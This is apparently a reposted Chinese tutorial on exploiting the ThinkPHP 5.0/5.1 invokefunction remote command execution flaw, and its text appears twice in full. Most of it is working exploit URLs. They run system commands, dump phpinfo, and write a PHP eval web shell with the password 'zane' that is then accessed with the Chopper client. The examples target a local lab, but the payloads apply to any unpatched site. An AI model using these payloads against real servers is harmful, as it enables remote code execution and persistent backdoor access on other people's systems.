ThinkPHP中存在哪些已知漏洞及其具体利用方法?
- 内容介绍
- 文章标签
- 相关推荐
本文共计404个文字,预计阅读时间需要2分钟。
下面是对原文的简化
想了解ThinkPHP框架?这里为您介绍ThinkPHP,涵盖漏洞利用,希望对需要帮助的朋友有所帮助!ThinkPHP 5x 命令执行漏洞+受影响版本:5.0及5.1Docker漏洞环境源码:[链接](https://github.com/vulnspy/thin)
下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
EXP127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
EXP:127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
使用菜刀连接
`
127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注自由互联其它相关文章!
本文共计404个文字,预计阅读时间需要2分钟。
下面是对原文的简化
想了解ThinkPHP框架?这里为您介绍ThinkPHP,涵盖漏洞利用,希望对需要帮助的朋友有所帮助!ThinkPHP 5x 命令执行漏洞+受影响版本:5.0及5.1Docker漏洞环境源码:[链接](https://github.com/vulnspy/thin)
下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
EXP127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
EXP:127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
使用菜刀连接
`
127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注自由互联其它相关文章!

